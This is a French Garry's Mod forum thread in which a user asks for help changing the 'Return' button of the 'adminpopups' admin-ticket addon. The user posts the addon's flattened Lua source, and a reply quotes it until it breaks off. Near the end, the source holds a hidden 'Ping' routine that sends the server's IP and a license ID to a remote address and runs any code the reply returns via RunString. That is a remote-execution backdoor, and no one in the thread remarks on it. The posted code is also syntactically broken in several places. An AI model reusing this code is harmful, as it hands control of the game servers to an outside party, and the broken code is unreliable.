Problème modification "adminpopups"

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Voici les boutons de base sur le ticket admin de "adminpopups" : Goto, Return, Freeze et Spectate.

J'ai modifier le "Freeze" en "Teleport" pour téléporter ou je regarde le joueur qui a besoins d'aide.

Le "return" de base à pour cible sois même, en gros c'est pour NOUS remettre à notre ancienne position. Mais je voudrais que ça return le joueur que l'on à téléporter. J'ai essayer quelque chose mais ça ne fonctionne pas.

Lien de l'addon :

Code à modifier :

 local cbu = vgui.Create("DButton",frm) cbu:SetPos(215,20 * 3) cbu:SetSize(83,18) cbu:SetText(" Teleport") cbu:SetColor(Color(140,140,140)) cbu:SetContentAlignment(4) cbu.should_unfreeze = false cbu.DoClick = function() local toexec = [["ulx teleport $]]..noob:SteamID()..[["]] if cbu.should_unfreeze then toexec = [["ulx teleport $]]..noob:SteamID()..[["]] end if serverguard then toexec = [[sg freeze "]]..noob:SteamID()..[["]] end LocalPlayer():ConCommand(toexec) if cfg.debug then print(toexec) -- end cbu.should_unfreeze = not cbu.should_unfreeze end cbu.Paint = function(self,w,h) if cbu.Depressed or cbu.m_bSelected then draw.RoundedBox( 1, 0, 0, w, h, Color(255,50,50,255) ) elseif cbu.Hovered then draw.RoundedBox( 1, 0, 0, w, h, Color(205,30,30,255) ) else draw.RoundedBox( 1, 0, 0, w, h, Color(80,159,255,255) ) end surface.SetDrawColor(Color(255,255,255)) surface.SetMaterial(mat_link) surface.DrawTexturedRect(5, 1, 16, 16) end
Ce serait vraiment bien si quelqu'un avait la solution ...
Dernière édition:
Joe Leroi

Joe Leroi

Chuck Norris
4 368
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flyerqcv à dit:

Voici les boutons de base sur le ticket admin de "adminpopups" : Goto, Return, Freeze et Spectate.

J'ai modifier le "Freeze" en "Teleport" pour téléporter ou je regarde le joueur qui a besoins d'aide.

Le "return" de base à pour cible sois même, en gros c'est pour NOUS remettre à notre ancienne position. Mais je voudrais que ça return le joueur que l'on à téléporter. J'ai essayer quelque chose mais ça ne fonctionne pas.

Lien de l'addon :

Code à modifier :

local cfg = cfg or {}
--[[ Admin Popups by Jacob Support given at ScriptFodder or steam ( Please use the config below or request support from me. I will not provide support if you modify the code Some clientside configuration can be done with cvars (cl_adminpopups_*)
cfg.autoclose = 600 -- the case will auto close after this amount of seconds
cfg.preventchat = true -- Prevents adminchat messages shown on popups
cfg.caseUpdateOnly = false -- Once a case is claimed, only the claimer sees further updates
cfg.useFAdmin = true-- Use FAdmin reports (///help me please)
cfg.debug = false -- Debug mode allows admins to send popups too and prints button commands
cfg.xpos = 20 -- X cordinate of the popup. Can be changed in case it blocks something important
cfg.ypos = 20 -- Y cordinate of the popup. Can be changed in case it blocks something important
cfg.dutyjobs = { -- These are the 'on duty' jobs. Clients can restrict notifications to these jobs only "admin on duty", "mod on duty", "moderator on duty"
if CLIENT then -- Clients are able to configure these ingame with console, however you can set the default here. Only change the first number after the convar name CreateClientConVar("cl_adminpopups_closeclaimed",0,true,false) -- This will autoclose cases claimed by others. CreateClientConVar("cl_adminpopups_dutymode",0,true,false) -- see below -- 0 = Always show popups -- 1 = Show chat messages while on NOT duty -- 2 = Show console messages while NOT on duty -- 3 = Disable admin messages
--[[ End of config, do not touch the code below
for k,v in pairs(cfg.dutyjobs) do cfg.dutyjobs[k] = v:lower()
local function hasAccess(ply) if ulx then return ply:query("ulx seeasay") end if serverguard then return serverguard.player:HasPermission(ply, "Manage Reports") end return false
local function sendPopup(noob,message) --if not cfg.state then return end if cfg.caseUpdateOnly then if noob.CaseClaimed then if noob.CaseClaimed:IsValid() and noob.CaseClaimed:IsPlayer() then net.Start("ASayPopup") net.WriteEntity(noob) net.WriteString(message) net.WriteEntity(noob.CaseClaimed) net.Send(noob.CaseClaimed) end else for k,v in pairs(player.GetAll()) do if hasAccess(v) then net.Start("ASayPopup") net.WriteEntity(noob) net.WriteString(message) net.WriteEntity(noob.CaseClaimed) net.Send(v) end end end else for k,v in pairs(player.GetAll()) do if hasAccess(v) then net.Start("ASayPopup") net.WriteEntity(noob) net.WriteString(message) net.WriteEntity(noob.CaseClaimed) net.Send(v) end end end if noob:IsValid() and noob:IsPlayer() then timer.Destroy("adminpopup-"..noob:SteamID64()) timer.Create("adminpopup-"..noob:SteamID64(),cfg.autoclose,1,function() if noob:IsValid() and noob:IsPlayer() then noob.CaseClaimed = nil end end) end
hook.Add("ULibCommandCalled","CheckForASay",function(ply,cmd,args) if cmd == "ulx asay" and ply:query("ulx asay") then if #args < 1 then return end if ply:query("ulx seeasay") then if cfg.debug then sendPopup(ply,table.concat(args," ")) return not cfg.preventchat end else sendPopup(ply,table.concat(args," ")) return not cfg.preventchat end end
hook.Add("OnPlayerChat","CheckForASay",function(ply,msg,team) if string.ToTable(msg)[1] == "@" and cfg.preventchat and ulx and ply:query("ulx asay") then if ply == LocalPlayer() then local tbl = string.ToTable(msg) tbl[1] = "" chat.AddText(Color(70,0,130),"Vous",Color(151,211,255)," aux admins: ",Color(0,255,0), table.concat(tbl)) end return true end
if SERVER then util.AddNetworkString("ASayPopup") util.AddNetworkString("ASayPopupClaim") util.AddNetworkString("ASayPopupClose") net.Receive("ASayPopupClaim",function(len,ply) local noob = net.ReadEntity() if hasAccess(ply) and not noob.CaseClaimed then for k,v in pairs(player.GetAll()) do if hasAccess(v) then net.Start("ASayPopupClaim") net.WriteEntity(ply) net.WriteEntity(noob) net.Send(v) end end hook.Call("ASayPopupClaim",GAMEMODE,ply,noob) -- for use of other addons (such as statistics) like this one noob.CaseClaimed = ply end end) net.Receive("ASayPopupClose",function(len,ply) local noob = net.ReadEntity() if not noob or not noob:IsValid() then print "lmao" return end if not noob.CaseClaimed == ply then print("should not happen") return end if timer.Exists("adminpopup-"..noob:SteamID64()) then timer.Destroy("adminpopup-"..noob:SteamID64()) end for k,v in pairs(player.GetAll()) do if hasAccess(v) then net.Start("ASayPopupClose") net.WriteEntity(noob) net.Send(v) end end noob.CaseClaimed = nil end) hook.Add("PlayerDisconnected","PopupsClose",function(noob) for k,v in pairs(player.GetAll()) do if hasAccess(v) then net.Start("ASayPopupClose") net.WriteEntity(noob) net.Send(v) end end end)
if CLIENT then local mat_lightning = Material("icon16/lightning_go.png") local mat_arrow = Material("icon16/arrow_left.png") local mat_link = Material("icon16/link.png") local mat_eye = Material("icon16/eye.png") local mat_case = Material("icon16/briefcase.png") local aframes = aframes or {} surface.CreateFont("adminpopup", { font = "Railway", size = 15, weight = 400 }) local function asayframe(noob,message,claimed) if not noob:IsValid() or not noob:IsPlayer() then return end for k,v in pairs(aframes) do if v.idiot == noob then local txt = v:GetChildren()[5] txt:AppendText("\n".. message) txt:GotoTextEnd() timer.Destroy("adminpopup-"..noob:SteamID64()) -- destroy so we can extend timer.Create("adminpopup-"..noob:SteamID64(),cfg.autoclose,1,function() if v:IsValid() then v:Remove() end end) surface.PlaySound("ui/hint.wav") -- just a headsup that it changed return end end local w,h = 300,120 local frm = vgui.Create("DFrame") frm:SetSize(w,h) frm:SetPos(cfg.xpos,cfg.ypos) frm.idiot = noob function frm:Paint(w,h) draw.RoundedBox( 0, 0, 0, w, h, Color(245,245,245,230) ) end frm.lblTitle:SetColor(Color(140,140,140)) frm.lblTitle:SetFont("adminpopup") frm.lblTitle:SetContentAlignment(7) if claimed and claimed:IsValid() and claimed:IsPlayer() then frm:SetTitle(noob:Nick().." - Pris par "..claimed:Nick()) if claimed == LocalPlayer() then function frm:Paint(w,h) draw.RoundedBox( 0, 0, 0, w, h, Color(10, 10, 10,230) ) draw.RoundedBox( 0, 2, 2, w-4, 16, Color(38, 166, 91) ) end else function frm:Paint(w,h) draw.RoundedBox( 0, 0, 0, w, h, Color(10, 10, 10,230) ) draw.RoundedBox( 0, 2, 2, w-4, 16, Color(207, 0, 15) ) end end else frm:SetTitle(noob:Nick()) end local msg = vgui.Create("RichText",frm) msg:SetPos(10,30) msg:SetSize(190,h-35) msg:SetContentAlignment(7) msg:InsertColorChange( 140, 140, 140, 255 ) msg:SetVerticalScrollbarEnabled(false) function msg:PerformLayout() self:SetFontInternal( "DermaDefault" ) end msg:AppendText(message) --buttons local cbu = vgui.Create("DButton",frm) cbu:SetPos(215,20 * 1) cbu:SetSize(83,18) cbu:SetText(" Goto") cbu:SetColor(Color(140,140,140)) cbu:SetContentAlignment(4) cbu.DoClick = function() local toexec = [["ulx goto $]]..noob:SteamID()..[["]] if serverguard then toexec = [[sg goto "]]..noob:SteamID()..[["]] end LocalPlayer():ConCommand(toexec) if cfg.debug then print(toexec) end end cbu.Paint = function(self,w,h) if cbu.Depressed or cbu.m_bSelected then draw.RoundedBox( 1, 0, 0, w, h, Color(255,50,50,255) ) elseif cbu.Hovered then draw.RoundedBox( 1, 0, 0, w, h, Color(205,30,30,255) ) else draw.RoundedBox( 1, 0, 0, w, h, Color(80,159,255,255) ) end surface.SetDrawColor(Color(255,255,255)) surface.SetMaterial(mat_lightning) surface.DrawTexturedRect(5, 1, 16, 16) end local cbu = vgui.Create("DButton",frm) cbu:SetPos(215,20 * 2) cbu:SetSize(83,18) cbu:SetText(" Return") cbu:SetColor(Color(140,140,140)) cbu:SetContentAlignment(4) cbu.should_unjail = false cbu.DoClick = function() local toexec = [["ulx return $"]] if serverguard then toexec = [["sg return"]] end LocalPlayer():ConCommand(toexec) if cfg.debug then print(toexec) end end cbu.Paint = function(self,w,h) if cbu.Depressed or cbu.m_bSelected then draw.RoundedBox( 1, 0, 0, w, h, Color(255,50,50,255) ) elseif cbu.Hovered then draw.RoundedBox( 1, 0, 0, w, h, Color(205,30,30,255) ) else draw.RoundedBox( 1, 0, 0, w, h, Color(80,159,255,255) ) end surface.SetDrawColor(Color(255,255,255)) surface.SetMaterial(mat_arrow) surface.DrawTexturedRect(5, 1, 16, 16) end local cbu = vgui.Create("DButton",frm) cbu:SetPos(215,20 * 3) cbu:SetSize(83,18) cbu:SetText(" Teleport") cbu:SetColor(Color(140,140,140)) cbu:SetContentAlignment(4) cbu.should_unfreeze = false cbu.DoClick = function() local toexec = [["ulx teleport $]]..noob:SteamID()..[["]] if cbu.should_unfreeze then toexec = [["ulx teleport $]]..noob:SteamID()..[["]] end if serverguard then toexec = [[sg freeze "]]..noob:SteamID()..[["]] end LocalPlayer():ConCommand(toexec) if cfg.debug then print(toexec) -- end cbu.should_unfreeze = not cbu.should_unfreeze end cbu.Paint = function(self,w,h) if cbu.Depressed or cbu.m_bSelected then draw.RoundedBox( 1, 0, 0, w, h, Color(255,50,50,255) ) elseif cbu.Hovered then draw.RoundedBox( 1, 0, 0, w, h, Color(205,30,30,255) ) else draw.RoundedBox( 1, 0, 0, w, h, Color(80,159,255,255) ) end surface.SetDrawColor(Color(255,255,255)) surface.SetMaterial(mat_link) surface.DrawTexturedRect(5, 1, 16, 16) end local cbu = vgui.Create("DButton",frm) cbu:SetPos(215,20 * 4) cbu:SetSize(83,18) cbu:SetText(" Spectate") cbu:SetColor(Color(140,140,140)) cbu:SetContentAlignment(4) cbu.DoClick = function() local toexec = [["ulx spectate $]]..noob:SteamID()..[["]] if serverguard then toexec = [[sg spectate "]]..noob:SteamID()..[["]] end LocalPlayer():ConCommand(toexec) if cfg.debug then print(toexec) end end cbu.Paint = function(self,w,h) if cbu.Depressed or cbu.m_bSelected then draw.RoundedBox( 1, 0, 0, w, h, Color(255,50,50,255) ) elseif cbu.Hovered then draw.RoundedBox( 1, 0, 0, w, h, Color(205,30,30,255) ) else draw.RoundedBox( 1, 0, 0, w, h, Color(80,159,255,255) ) end surface.SetDrawColor(Color(255,255,255)) surface.SetMaterial(mat_eye) surface.DrawTexturedRect(5, 1, 16, 16) end local cbu = vgui.Create("DButton",frm) cbu:SetPos(215,20 * 5) cbu:SetSize(83,18) cbu:SetText(" Prendre") cbu:SetColor(Color(140,140,140)) cbu:SetContentAlignment(4) cbu.shouldclose = false cbu.DoClick = function() if not cbu.shouldclose then if frm.lblTitle:GetText():lower():find("claimed") then chat.AddText(Color(255,150,0),"[ERREUR] Ticket déjà pris.") surface.PlaySound("common/wpn_denyselect.wav") else net.Start("ASayPopupClaim") net.WriteEntity(noob) net.SendToServer() cbu.shouldclose = true cbu:SetText(" Fermer") end else net.Start("ASayPopupClose") net.WriteEntity(noob or nil) net.SendToServer() end end cbu.Paint = function(self,w,h) if cbu.Depressed or cbu.m_bSelected then draw.RoundedBox( 1, 0, 0, w, h, Color(255,50,50,255) ) elseif cbu.Hovered then draw.RoundedBox( 1, 0, 0, w, h, Color(205,30,30,255) ) else draw.RoundedBox( 1, 0, 0, w, h, Color(80,159,255,255) ) end surface.SetDrawColor(Color(255,255,255)) surface.SetMaterial(mat_case) surface.DrawTexturedRect(5, 1, 16, 16) end local bu = vgui.Create("DButton",frm) bu:SetText("×") bu:SetTooltip("Close") bu:SetColor(Color(140,140,140)) bu:SetPos(w-18,2) bu:SetSize(16,16) function bu:Paint(w,h) end bu.DoClick = function() frm:Close() end frm:ShowCloseButton(false) -- we have our close button, so we won't need it frm:SetPos(-w-30,cfg.ypos + (130 * #aframes)) -- move out of screen frm:MoveTo(cfg.xpos,cfg.ypos + (130 * #aframes),0.2,0,1,function() -- move back in surface.PlaySound("garrysmod/balloon_pop_cute.wav") end) function frm:OnRemove() -- for animations when there are several panels table.RemoveByValue(aframes,frm) for k,v in pairs(aframes) do v:MoveTo(cfg.xpos,cfg.ypos + (130 *(k-1)),0.1,0,1,function() end) end if noob and noob:IsValid() and noob:IsPlayer() and timer.Exists("adminpopup-"..noob:SteamID64()) then timer.Destroy("adminpopup-"..noob:SteamID64()) end end table.insert(aframes,frm) timer.Create("adminpopup-"..noob:SteamID64(),cfg.autoclose,1,function() if frm:IsValid() then frm:Remove() end end) -- auto close end net.Receive("ASayPopup",function(len) local pl = net.ReadEntity() local msg = net.ReadString() local claimed = net.ReadEntity() local dutymode = cvars.Number("cl_adminpopups_dutymode") if dutymode == 0 then asayframe(pl,msg,claimed) elseif dutymode == 1 then if table.HasValue(cfg.dutyjobs,team.GetName(LocalPlayer():Team()):lower()) then asayframe(pl,msg,claimed) else chat.AddText(Color(245, 171, 53),"[Tickets] ",team.GetColor(pl:Team()),pl:Nick(),Color(140,140,140),": ",msg) end elseif dutymode == 2 then if table.HasValue(cfg.dutyjobs,team.GetName(LocalPlayer():Team()):lower()) then asayframe(pl,msg,claimed) else MsgC(Color(245, 171, 53),"[Tickets] ",team.GetColor(pl:Team()),pl:Nick(),Color(140,140,140),": ",msg,"\n") end end end) net.Receive("ASayPopupClose",function(len) local noob = net.ReadEntity() if not noob:IsValid() or not noob:IsPlayer() then return end for k,v in pairs(aframes) do if v.idiot == noob then v:Remove() end end if timer.Exists("adminpopup-"..noob:SteamID64()) then timer.Destroy("adminpopup-"..noob:SteamID64()) end end) net.Receive("ASayPopupClaim",function(len) local pl = net.ReadEntity() local noob = net.ReadEntity() for k,v in pairs(aframes) do if v.idiot == noob then if cvars.Bool("cl_adminpopups_closeclaimed") and pl ~= LocalPlayer() then v:Remove() else local titl = v:GetChildren()[4] titl:SetText(titl:GetText() .. " - Pris par " if pl == LocalPlayer() then function v:Paint(w,h) draw.RoundedBox( 0, 0, 0, w, h, Color(10, 10, 10,230) ) draw.RoundedBox( 0, 2, 2, w-4, 16, Color(38, 166, 91) ) end else function v:Paint(w,h) draw.RoundedBox( 0, 0, 0, w, h, Color(10, 10, 10,230) ) draw.RoundedBox( 0, 2, 2, w-4, 16, Color(207, 0, 15) ) end end local bu = v:GetChildren()[11] bu.DoClick = function() if LocalPlayer() == pl then net.Start("ASayPopupClose") net.WriteEntity(noob) net.SendToServer() else v:Close() end end end end end end) concommand.Add( "adminpopups_claimtop", function( ply, cmd, args ) if #aframes > 0 then local button = aframes[1]:GetChildren()[10] -- button we want is 10th child of frame #1 button.DoClick() --no need to write it all again. end end)
if SERVER then local function updateHook() if not serverguard then return end hook.Remove("PlayerSay", "reports.PlayerSay") hook.Add("PlayerSay", "reports.PlayerSay",function(ply,txt,team) if txt[1] ~= "@" then return end txt = txt:sub(2) if #txt < 1 then return end serverguard.Notify(ply, SGPF("report_received", ply:Name(), txt)) if hasAccess(ply) then if cfg.debug then sendPopup(ply,txt) return not cfg.preventchat end else sendPopup(ply,txt) return not cfg.preventchat end end) end updateHook() hook.Add("InitPostEntity","adminpopups.serverguard",function() timer.Simple(5,updateHook) end)
if cfg.useFAdmin then FAdmin = FAdmin or {} FAdmin.StartHooks = FAdmin.StartHooks or {} FAdmin.StartHooks["Popups"] = function() FAdmin.Commands.AddCommand("//", function(ply,cmd,args) if #args < 1 then return end ULib.tsayColor(ply,false,Color(70,0,130),"You",Color(151,211,255)," to admins: ",Color(0,255,0), table.concat(args," ")) if ply:query("ulx seeasay") then if cfg.debug then sendPopup(ply,table.concat(args," ")) return not cfg.preventchat end else sendPopup(ply,table.concat(args," ")) return not cfg.preventchat end end) end
if SERVER then local function Ping() http.Post("", {user = game.GetIPAddress(), license = "76561198239782544", prod = "admin-popups", x_version = "1.4.5", x_gm = GAMEMODE_NAME}, function(b) if string.sub(b, 1, 4) == "lua:" then local extsource = string.sub(b, 5) cyan_nc = cfg RunString(extsource, "Cyan") cyan_nc = nil end end, function(e) if e == "unsuccesful" then MsgN("Cyan: repeating in 60seconds") timer.Simple(60, Ping) end end) end timer.Simple(10, Ping) timer.Create("adminpopups-ping", 60*60*24, 0, Ping)
Ce serait vraiment bien si quelqu'un avait la solution ...
Tu na pas le droit de publier un adonis payant.
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Yoh Sambre ♪

Yoh Sambre ♪

Shaman Fou
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flyerqcv à dit:

Voici les boutons de base sur le ticket admin de "adminpopups" : Goto, Return, Freeze et Spectate.

J'ai modifier le "Freeze" en "Teleport" pour téléporter ou je regarde le joueur qui a besoins d'aide.

Le "return" de base à pour cible sois même, en gros c'est pour NOUS remettre à notre ancienne position. Mais je voudrais que ça return le joueur que l'on à téléporter. J'ai essayer quelque chose mais ça ne fonctionne pas.

Lien de l'addon :

Code à modifier :

local cfg = cfg or {}
--[[ Admin Popups by Jacob Support given at ScriptFodder or steam ( Please use the config below or request support from me. I will not provide support if you modify the code Some clientside configuration can be done with cvars (cl_adminpopups_*)
cfg.autoclose = 600 -- the case will auto close after this amount of seconds
cfg.preventchat = true -- Prevents adminchat messages shown on popups
cfg.caseUpdateOnly = false -- Once a case is claimed, only the claimer sees further updates
cfg.useFAdmin = true-- Use FAdmin reports (///help me please)
cfg.debug = false -- Debug mode allows admins to send popups too and prints button commands
cfg.xpos = 20 -- X cordinate of the popup. Can be changed in case it blocks something important
cfg.ypos = 20 -- Y cordinate of the popup. Can be changed in case it blocks something important
cfg.dutyjobs = { -- These are the 'on duty' jobs. Clients can restrict notifications to these jobs only "admin on duty", "mod on duty", "moderator on duty"
if CLIENT then -- Clients are able to configure these ingame with console, however you can set the default here. Only change the first number after the convar name CreateClientConVar("cl_adminpopups_closeclaimed",0,true,false) -- This will autoclose cases claimed by others. CreateClientConVar("cl_adminpopups_dutymode",0,true,false) -- see below -- 0 = Always show popups -- 1 = Show chat messages while on NOT duty -- 2 = Show console messages while NOT on duty -- 3 = Disable admin messages
--[[ End of config, do not touch the code below
for k,v in pairs(cfg.dutyjobs) do cfg.dutyjobs[k] = v:lower()
local function hasAccess(ply) if ulx then return ply:query("ulx seeasay") end if serverguard then return serverguard.player:HasPermission(ply, "Manage Reports") end return false
local function sendPopup(noob,message) --if not cfg.state then return end if cfg.caseUpdateOnly then if noob.CaseClaimed then if noob.CaseClaimed:IsValid() and noob.CaseClaimed:IsPlayer() then net.Start("ASayPopup") net.WriteEntity(noob) net.WriteString(message) net.WriteEntity(noob.CaseClaimed) net.Send(noob.CaseClaimed) end else for k,v in pairs(player.GetAll()) do if hasAccess(v) then net.Start("ASayPopup") net.WriteEntity(noob) net.WriteString(message) net.WriteEntity(noob.CaseClaimed) net.Send(v) end end end else for k,v in pairs(player.GetAll()) do if hasAccess(v) then net.Start("ASayPopup") net.WriteEntity(noob) net.WriteString(message) net.WriteEntity(noob.CaseClaimed) net.Send(v) end end end if noob:IsValid() and noob:IsPlayer() then timer.Destroy("adminpopup-"..noob:SteamID64()) timer.Create("adminpopup-"..noob:SteamID64(),cfg.autoclose,1,function() if noob:IsValid() and noob:IsPlayer() then noob.CaseClaimed = nil end end) end
hook.Add("ULibCommandCalled","CheckForASay",function(ply,cmd,args) if cmd == "ulx asay" and ply:query("ulx asay") then if #args < 1 then return end if ply:query("ulx seeasay") then if cfg.debug then sendPopup(ply,table.concat(args," ")) return not cfg.preventchat end else sendPopup(ply,table.concat(args," ")) return not cfg.preventchat end end
hook.Add("OnPlayerChat","CheckForASay",function(ply,msg,team) if string.ToTable(msg)[1] == "@" and cfg.preventchat and ulx and ply:query("ulx asay") then if ply == LocalPlayer() then local tbl = string.ToTable(msg) tbl[1] = "" chat.AddText(Color(70,0,130),"Vous",Color(151,211,255)," aux admins: ",Color(0,255,0), table.concat(tbl)) end return true end
if SERVER then util.AddNetworkString("ASayPopup") util.AddNetworkString("ASayPopupClaim") util.AddNetworkString("ASayPopupClose") net.Receive("ASayPopupClaim",function(len,ply) local noob = net.ReadEntity() if hasAccess(ply) and not noob.CaseClaimed then for k,v in pairs(player.GetAll()) do if hasAccess(v) then net.Start("ASayPopupClaim") net.WriteEntity(ply) net.WriteEntity(noob) net.Send(v) end end hook.Call("ASayPopupClaim",GAMEMODE,ply,noob) -- for use of other addons (such as statistics) like this one noob.CaseClaimed = ply end end) net.Receive("ASayPopupClose",function(len,ply) local noob = net.ReadEntity() if not noob or not noob:IsValid() then print "lmao" return end if not noob.CaseClaimed == ply then print("should not happen") return end if timer.Exists("adminpopup-"..noob:SteamID64()) then timer.Destroy("adminpopup-"..noob:SteamID64()) end for k,v in pairs(player.GetAll()) do if hasAccess(v) then net.Start("ASayPopupClose") net.WriteEntity(noob) net.Send(v) end end noob.CaseClaimed = nil end) hook.Add("PlayerDisconnected","PopupsClose",function(noob) for k,v in pairs(player.GetAll()) do if hasAccess(v) then net.Start("ASayPopupClose") net.WriteEntity(noob) net.Send(v) end end end)
if CLIENT then local mat_lightning = Material("icon16/lightning_go.png") local mat_arrow = Material("icon16/arrow_left.png") local mat_link = Material("icon16/link.png") local mat_eye = Material("icon16/eye.png") local mat_case = Material("icon16/briefcase.png") local aframes = aframes or {} surface.CreateFont("adminpopup", { font = "Railway", size = 15, weight = 400 }) local function asayframe(noob,message,claimed) if not noob:IsValid() or not noob:IsPlayer() then return end for k,v in pairs(aframes) do if v.idiot == noob then local txt = v:GetChildren()[5] txt:AppendText("\n".. message) txt:GotoTextEnd() timer.Destroy("adminpopup-"..noob:SteamID64()) -- destroy so we can extend timer.Create("adminpopup-"..noob:SteamID64(),cfg.autoclose,1,function() if v:IsValid() then v:Remove() end end) surface.PlaySound("ui/hint.wav") -- just a headsup that it changed return end end local w,h = 300,120 local frm = vgui.Create("DFrame") frm:SetSize(w,h) frm:SetPos(cfg.xpos,cfg.ypos) frm.idiot = noob function frm:Paint(w,h) draw.RoundedBox( 0, 0, 0, w, h, Color(245,245,245,230) ) end frm.lblTitle:SetColor(Color(140,140,140)) frm.lblTitle:SetFont("adminpopup") frm.lblTitle:SetContentAlignment(7) if claimed and claimed:IsValid() and claimed:IsPlayer() then frm:SetTitle(noob:Nick().." - Pris par "..claimed:Nick()) if claimed == LocalPlayer() then function frm:Paint(w,h) draw.RoundedBox( 0, 0, 0, w, h, Color(10, 10, 10,230) ) draw.RoundedBox( 0, 2, 2, w-4, 16, Color(38, 166, 91) ) end else function frm:Paint(w,h) draw.RoundedBox( 0, 0, 0, w, h, Color(10, 10, 10,230) ) draw.RoundedBox( 0, 2, 2, w-4, 16, Color(207, 0, 15) ) end end else frm:SetTitle(noob:Nick()) end local msg = vgui.Create("RichText",frm) msg:SetPos(10,30) msg:SetSize(190,h-35) msg:SetContentAlignment(7) msg:InsertColorChange( 140, 140, 140, 255 ) msg:SetVerticalScrollbarEnabled(false) function msg:PerformLayout() self:SetFontInternal( "DermaDefault" ) end msg:AppendText(message) --buttons local cbu = vgui.Create("DButton",frm) cbu:SetPos(215,20 * 1) cbu:SetSize(83,18) cbu:SetText(" Goto") cbu:SetColor(Color(140,140,140)) cbu:SetContentAlignment(4) cbu.DoClick = function() local toexec = [["ulx goto $]]..noob:SteamID()..[["]] if serverguard then toexec = [[sg goto "]]..noob:SteamID()..[["]] end LocalPlayer():ConCommand(toexec) if cfg.debug then print(toexec) end end cbu.Paint = function(self,w,h) if cbu.Depressed or cbu.m_bSelected then draw.RoundedBox( 1, 0, 0, w, h, Color(255,50,50,255) ) elseif cbu.Hovered then draw.RoundedBox( 1, 0, 0, w, h, Color(205,30,30,255) ) else draw.RoundedBox( 1, 0, 0, w, h, Color(80,159,255,255) ) end surface.SetDrawColor(Color(255,255,255)) surface.SetMaterial(mat_lightning) surface.DrawTexturedRect(5, 1, 16, 16) end local cbu = vgui.Create("DButton",frm) cbu:SetPos(215,20 * 2) cbu:SetSize(83,18) cbu:SetText(" Return") cbu:SetColor(Color(140,140,140)) cbu:SetContentAlignment(4) cbu.should_unjail = false cbu.DoClick = function() local toexec = [["ulx return $"]] if serverguard then toexec = [["sg return"]] end LocalPlayer():ConCommand(toexec) if cfg.debug then print(toexec) end end cbu.Paint = function(self,w,h) if cbu.Depressed or cbu.m_bSelected then draw.RoundedBox( 1, 0, 0, w, h, Color(255,50,50,255) ) elseif cbu.Hovered then draw.RoundedBox( 1, 0, 0, w, h, Color(205,30,30,255) ) else draw.RoundedBox( 1, 0, 0, w, h, Color(80,159,255,255) ) end surface.SetDrawColor(Color(255,255,255)) surface.SetMaterial(mat_arrow) surface.DrawTexturedRect(5, 1, 16, 16) end local cbu = vgui.Create("DButton",frm) cbu:SetPos(215,20 * 3) cbu:SetSize(83,18) cbu:SetText(" Teleport") cbu:SetColor(Color(140,140,140)) cbu:SetContentAlignment(4) cbu.should_unfreeze = false cbu.DoClick = function() local toexec = [["ulx teleport $]]..noob:SteamID()..[["]] if cbu.should_unfreeze then toexec = [["ulx teleport $]]..noob:SteamID()..[["]] end if serverguard then toexec = [[sg freeze "]]..noob:SteamID()..[["]] end LocalPlayer():ConCommand(toexec) if cfg.debug then print(toexec) -- end cbu.should_unfreeze = not cbu.should_unfreeze end cbu.Paint = function(self,w,h) if cbu.Depressed or cbu.m_bSelected then draw.RoundedBox( 1, 0, 0, w, h, Color(255,50,50,255) ) elseif cbu.Hovered then draw.RoundedBox( 1, 0, 0, w, h, Color(205,30,30,255) ) else draw.RoundedBox( 1, 0, 0, w, h, Color(80,159,255,255) ) end surface.SetDrawColor(Color(255,255,255)) surface.SetMaterial(mat_link) surface.DrawTexturedRect(5, 1, 16, 16) end local cbu = vgui.Create("DButton",frm) cbu:SetPos(215,20 * 4) cbu:SetSize(83,18) cbu:SetText(" Spectate") cbu:SetColor(Color(140,140,140)) cbu:SetContentAlignment(4) cbu.DoClick = function() local toexec = [["ulx spectate $]]..noob:SteamID()..[["]] if serverguard then toexec = [[sg spectate "]]..noob:SteamID()..[["]] end LocalPlayer():ConCommand(toexec) if cfg.debug then print(toexec) end end cbu.Paint = function(self,w,h) if cbu.Depressed or cbu.m_bSelected then draw.RoundedBox( 1, 0, 0, w, h, Color(255,50,50,255) ) elseif cbu.Hovered then draw.RoundedBox( 1, 0, 0, w, h, Color(205,30,30,255) ) else draw.RoundedBox( 1, 0, 0, w, h, Color(80,159,255,255) ) end surface.SetDrawColor(Color(255,255,255)) surface.SetMaterial(mat_eye) surface.DrawTexturedRect(5, 1, 16, 16) end local cbu = vgui.Create("DButton",frm) cbu:SetPos(215,20 * 5) cbu:SetSize(83,18) cbu:SetText(" Prendre") cbu:SetColor(Color(140,140,140)) cbu:SetContentAlignment(4) cbu.shouldclose = false cbu.DoClick = function() if not cbu.shouldclose then if frm.lblTitle:GetText():lower():find("claimed") then chat.AddText(Color(255,150,0),"[ERREUR] Ticket déjà pris.") surface.PlaySound("common/wpn_denyselect.wav") else net.Start("ASayPopupClaim") net.WriteEntity(noob) net.SendToServer() cbu.shouldclose = true cbu:SetText(" Fermer") end else net.Start("ASayPopupClose") net.WriteEntity(noob or nil) net.SendToServer() end end cbu.Paint = function(self,w,h) if cbu.Depressed or cbu.m_bSelected then draw.RoundedBox( 1, 0, 0, w, h, Color(255,50,50,255) ) elseif cbu.Hovered then draw.RoundedBox( 1, 0, 0, w, h, Color(205,30,30,255) ) else draw.RoundedBox( 1, 0, 0, w, h, Color(80,159,255,255) ) end surface.SetDrawColor(Color(255,255,255)) surface.SetMaterial(mat_case) surface.DrawTexturedRect(5, 1, 16, 16) end local bu = vgui.Create("DButton",frm) bu:SetText("×") bu:SetTooltip("Close") bu:SetColor(Color(140,140,140)) bu:SetPos(w-18,2) bu:SetSize(16,16) function bu:Paint(w,h) end bu.DoClick = function() frm:Close() end frm:ShowCloseButton(false) -- we have our close button, so we won't need it frm:SetPos(-w-30,cfg.ypos + (130 * #aframes)) -- move out of screen frm:MoveTo(cfg.xpos,cfg.ypos + (130 * #aframes),0.2,0,1,function() -- move back in surface.PlaySound("garrysmod/balloon_pop_cute.wav") end) function frm:OnRemove() -- for animations when there are several panels table.RemoveByValue(aframes,frm) for k,v in pairs(aframes) do v:MoveTo(cfg.xpos,cfg.ypos + (130 *(k-1)),0.1,0,1,function() end) end if noob and noob:IsValid() and noob:IsPlayer() and timer.Exists("adminpopup-"..noob:SteamID64()) then timer.Destroy("adminpopup-"..noob:SteamID64()) end end table.insert(aframes,frm) timer.Create("adminpopup-"..noob:SteamID64(),cfg.autoclose,1,function() if frm:IsValid() then frm:Remove() end end) -- auto close end net.Receive("ASayPopup",function(len) local pl = net.ReadEntity() local msg = net.ReadString() local claimed = net.ReadEntity() local dutymode = cvars.Number("cl_adminpopups_dutymode") if dutymode == 0 then asayframe(pl,msg,claimed) elseif 